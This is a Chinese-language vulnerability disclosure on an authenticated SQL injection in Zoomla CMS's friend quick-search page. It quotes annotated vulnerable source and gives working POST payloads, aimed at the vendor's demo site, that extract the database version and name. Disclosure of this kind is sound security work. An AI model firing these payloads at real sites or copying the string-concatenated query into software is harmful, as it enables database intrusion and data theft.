### 简要描述:
逐浪CMS最新版存在SQL注入（普通用户登录后即可触发）
### 详细说明:
逐浪CMS最新版的好友快速搜索结果页存在SQL注入。
可以注册普通用户
访问
```
http://demo.zoomla.cn/User/Register.aspx
```
任意注册一个用户，例如：用户名 test1234，密码 123456
访问
```
http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=
```
登录
访问
```
http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx
```
该页面 Page_Load 的源码如下（wcounty、wcity 两个表单参数未经任何处理就拼接进了 SQL 条件）：
```
// Page_Load of Friend_quickSYResult.aspx, as quoted in this report.
// On the first (non-postback) request it builds a SQL filter fragment ("wherex") from five
// form fields and, for a logged-in user, passes that fragment to UserTableBLL.GetUsersInfo.
// Security summary: "sex" is only compared against fixed literals and "age1"/"age2" go through
// Convert.ToInt32, but "wcounty" and "wcity" are concatenated into the fragment verbatim.
protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
// All five values are read straight from the submitted form, i.e. they are client-controlled.
string str = base.Request.Form["sex"];
string str2 = base.Request.Form["age1"];
string str3 = base.Request.Form["age2"];
string str4 = base.Request.Form["wcounty"]; // not sanitized or validated
string str5 = base.Request.Form["wcity"]; // not sanitized or validated
string wherex = "";
// Only one of the two constant fragments below can be appended; the submitted text itself
// never reaches the SQL fragment.
if (!string.IsNullOrEmpty(str))
{
if (str == "女生")
{
wherex = wherex + " and UserSex=0";
}
else if (str == "男生")
{
wherex = wherex + " and UserSex=1";
}
}
// Convert.ToInt32 throws on non-numeric text, so only a server-formatted date string is
// concatenated here. NOTE(review): that exception is not handled in this method, and the
// ToShortDateString output depends on the server culture - confirm it matches what the
// database expects.
if (!string.IsNullOrEmpty(str2))
{
string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString();
wherex = wherex + " and BirthDay<='" + str7 + "'";
}
if (!string.IsNullOrEmpty(str3))
{
string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString();
wherex = wherex + " and BirthDay>='" + str8 + "'";
}
// VULNERABLE: str4 and str5 are placed inside quoted SQL literals without escaping, so a
// single quote in either value ends the literal and the rest of the value is read as SQL.
// str5 is only appended when str4 is non-empty.
// Mitigation (review note): pass these values as SQL parameters instead of concatenating
// them. That presumably requires GetUsersInfo to accept parameters rather than a raw
// fragment - its implementation is not shown here.
if (!string.IsNullOrEmpty(str4))
{
wherex = wherex + " and workProvince='" + str4 + "'"; // SQL injection
if (!string.IsNullOrEmpty(str5))
{
wherex = wherex + " and workCity='" + str5 + "'"; // SQL injection
}
}
// The fragment, including any injected text, is also kept in ViewState; how it is used on
// later requests is not shown in this listing.
this.ViewState["wherex"] = wherex;
if (!this.buser.CheckLogin())
{
// Not logged in: no query runs. PhValCode is shown only when the site enables a check code
// for login (presumably the captcha placeholder), and clearing the display style on dwindow
// presumably reveals the login dialog.
if (SiteConfig.UserConfig.EnableCheckCodeOfLogin)
{
this.PhValCode.Visible = true;
}
else
{
this.PhValCode.Visible = false;
}
this.dwindow.Style["display"] = "";
}
else
{
// Logged in: the fragment is handed to GetUsersInfo (presumably appended to the WHERE clause
// of a SELECT - implementation not shown) and the result is bound to the page. This is why
// any registered account is enough to reach the vulnerable query.
// The DataTable created on the next line is immediately replaced by the query result.
DataTable dt = new DataTable();
dt = UserTableBLL.GetUsersInfo(wherex);
this.Bind(dt);
}
}
}
```
访问
```
http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx
```
以 POST 表单方式提交以下数据（wcity 中的单引号会闭合 SQL 字符串字面量）：
```
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --
```
[![71.png](https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png)](https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png)
提交
```
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --
```
[![72.png](https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png)](https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png)
### 漏洞证明:
漏洞证明如上